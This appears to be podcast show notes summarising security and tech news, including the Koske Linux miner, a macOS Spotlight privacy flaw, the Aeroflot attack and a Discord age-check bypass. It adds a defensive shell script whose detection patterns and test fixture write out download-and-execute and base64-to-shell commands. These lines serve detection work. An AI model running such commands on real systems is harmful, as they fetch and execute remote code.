Infosec Decoded Season 5 #59: AI-Generated Malware

With Doug Spindler and sambowne@infosec.exchange

Recorded Tue, July 29, 2025

AI

AI-Generated Linux Miner 'Koske' Beats Human Malware
Koske uses layer upon layer of tricks to establish persistence and concealment in a target's system. It installs a rootkit, schedules cron jobs, and alters Linux startup files to ensure it starts upon any system reboot.

It was apparently developed with AI, so it has an impressive array of troubleshooting methods to connect to its C2 infrastructure: resetting and changing proxy and domain name system (DNS) settings, erasing firewall rules, etc.

Koske Malware Hides in Panda Images, Weaponizes AI to Target Linux
Koske uses stealth rootkits to hide its files, processes, and even its own presence from system monitoring tools. It establishes persistence through cron jobs, modifications to .bashrc and .bash_logout, and even creates custom systemd services. Its connectivity module is capable of proxy discovery and failover, giving it resilience in varied network conditions—a hallmark of AI-generated logic.

Security researchers have flagged verbose, modular code structures, well-commented logic, and defensive programming patterns as signs that large language models (LLMs) played a role in writing Koske. This points to a disturbing new frontier: the rise of AI-generated malware that can learn, adapt, and hide better than anything seen before.
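A defender-side audit of the persistence locations the two Koske summaries name (cron, ~/.bashrc, ~/.bash_logout, custom systemd units), added here as an example and not code from the podcast or from the Koske write-ups; the indicator regex list, the fixture tree and the helper names are assumptions, not Koske signatures.

```shell
#!/bin/sh
# Added example (not from the podcast or the Koske write-ups): audit the
# persistence spots the Koske summaries name (cron, ~/.bashrc, ~/.bash_logout,
# custom systemd units) under ROOT (/ on a live host, or a mounted image).
# PATTERNS is an assumed, illustrative download-and-execute list, not Koske IoCs.
PATTERNS='curl[^|]*[|][[:space:]]*(ba)?sh|wget[^|]*[|][[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|/dev/shm/'

# persistence_paths ROOT: list existing candidate files (unmatched globs skipped).
persistence_paths() {
    for f in "$1"/etc/crontab "$1"/etc/cron.d/* "$1"/var/spool/cron/crontabs/* \
             "$1"/root/.bashrc "$1"/root/.bash_logout \
             "$1"/home/*/.bashrc "$1"/home/*/.bash_logout \
             "$1"/etc/systemd/system/*.service \
             "$1"/home/*/.config/systemd/user/*.service; do
        [ -f "$f" ] && printf '%s\n' "$f"
    done
    return 0
}

# scan_file FILE: print FILE:LINENO:TEXT for every line matching PATTERNS.
scan_file() {
    grep -nE "$PATTERNS" "$1" 2>/dev/null | sed "s|^|$1:|"
    return 0
}

# audit_persistence ROOT: print all findings; count_hits ROOT: print their number.
audit_persistence() {
    persistence_paths "$1" | while IFS= read -r f; do scan_file "$f"; done
    return 0
}
count_hits() { n=$(audit_persistence "$1" | wc -l); echo $((n + 0)); }

# make_fixture DIR: constructed offline sample tree with one benign .bashrc,
# a download-and-execute .bash_logout, a base64-decoding cron job, and a
# harmless systemd unit; a scan of it should flag exactly two lines.
make_fixture() {
    mkdir -p "$1/home/alice" "$1/etc/cron.d" "$1/etc/systemd/system"
    printf 'export PATH="$PATH:$HOME/bin"\n' > "$1/home/alice/.bashrc"
    printf 'curl -s http://203.0.113.5/x | sh\n' > "$1/home/alice/.bash_logout"
    printf '*/5 * * * * root echo aGk= | base64 -d | sh\n' > "$1/etc/cron.d/sys-update"
    printf '[Service]\nExecStart=/usr/bin/true\n' > "$1/etc/systemd/system/clean.service"
}

# Stand-alone demo: ./audit.sh --demo builds the fixture and audits it.
if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp -d) && make_fixture "$tmp" && audit_persistence "$tmp"
    echo "hits: $(count_hits "$tmp")"; rm -rf "$tmp"
fi
```

Run it against a mounted disk image rather than the live root when a rootkit is suspected, since the summaries note Koske hides its files from tools on the compromised host.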

Microsoft: macOS Sploitlight flaw leaks Apple Intelligence data
Apple's Transparency, Consent, and Control (TCC) is a security feature that blocks apps from accessing private user data; it requires users to allow access in System Settings for each app. This Sploitlight attack uses the privileged access of Spotlight plugins to access sensitive files and steal their contents.

This includes, but is not limited to, photo and video metadata, precise geolocation data, face and person recognition data, user activity and event context, photo albums and shared libraries, search history and user preferences, as well as deleted photos and videos.

Apple has fixed the security flaw in patches released in March for macOS Sequoia 15.4 with "improved data redaction."

How Anthropic teams use Claude Code
While many of their use cases were predictable—debugging, navigating codebases, managing workflows—others surprised us. Lawyers built phone tree systems. Marketers generated hundreds of ad variations in seconds. Data scientists created complex visualizations without knowing JavaScript.

The pattern became clear: agentic coding isn't just accelerating traditional development. It's dissolving the boundary between technical and non-technical work, turning anyone who can describe a problem into someone who can build a solution.

Politics

Trump admin. is muffling CDC’s flagship health journal, report finds
Scientific articles must now obtain clearance for publication from health secretary and anti-vaccine activist Robert F. Kennedy Jr.—who has no health, science, or medical background. A spokesperson for the Department of Health and Human Services disputed this claim, calling it "false."
Nude women streamed to office TV derail Oklahoma Board of Education meeting
How the Trump FCC justified requiring a “bias monitor” at CBS

Infosec

Another Google Pixel 6a catches fire after battery-nerfing update
In early July, Google's monthly Pixel patch included a major change for the Pixel 6a. Due to the risk of battery fires, Google said that devices with more than 400 charge cycles could see their capacity and charging speed drastically reduced. But in at least one case, even this heavy-handed update wasn't enough—a user has reported their up-to-date Pixel 6a recently exploded overnight.
Video: China unleashes ‘world’s fastest’ humanoid robot that dances, packs parcels
The full-sized humanoid, which is 5.7 feet (175 cm) tall, is now the fastest humanoid robot, capable of sprinting up to 14.4 km/h (9 mph). The L7, created for visually striking demonstrations and real-world uses, is capable of industrial chores like sorting, scanning, and handling power tools and athletic exploits like 360-degree spins and breakdancing.
Neuralink helps paralysed woman write her name after 20 years
She is the first woman in the world to receive the implant. The chip, once inserted, allows users to control digital interfaces through brain signals alone. “She is controlling her computer just by thinking. Most people don’t realise it is possible,” Musk wrote.

“It was brain surgery, they drilled a hole in my skull and placed 128 threads into my motor cortex,” she wrote. “The chip is about the size of a quarter.”

CYBERSTRIKE ON RUSSIAN AEROFLOT!
They destroyed over 7 thousand servers and workstations, causing cancellations of over 100 flights. The network uses Windows XP and 2003, which led to the compromise of their entire infrastructure. Successful penetration is largely due to the fact that some company employees neglect basic password security. So Aeroflot CEO Sergey Aleksandrovsky hasn’t changed his password since 2022.
Tea app leak worsens with second database exposing user chats
The Tea app is a women-only dating safety platform where members can share reviews about men, with access to the platform only granted after providing a selfie and government ID verification.

The Tea app data breach has grown into an even larger leak, with the stolen data now shared on hacking forums and a second database discovered that allegedly contains 1.1 million private messages exchanged between the app's members.

Huawei shows off AI computing system to rival Nvidia's top product
Huawei Technologies showed off an AI computing system on Saturday that one industry expert has said rivals Nvidia's most advanced offering.
Brits can get around Discord's age verification thanks to Death Stranding's photo mode, bypassing the measure introduced with the UK's Online Safety Act. We tried it and it works—thanks, Kojima
Death Stranding is a 2019 action-adventure game. The method requires using a phone for the Discord age verification, opening Death Stranding's Photo Mode, and preparing a close-up of Sam Porter, played by one Norman Reedus.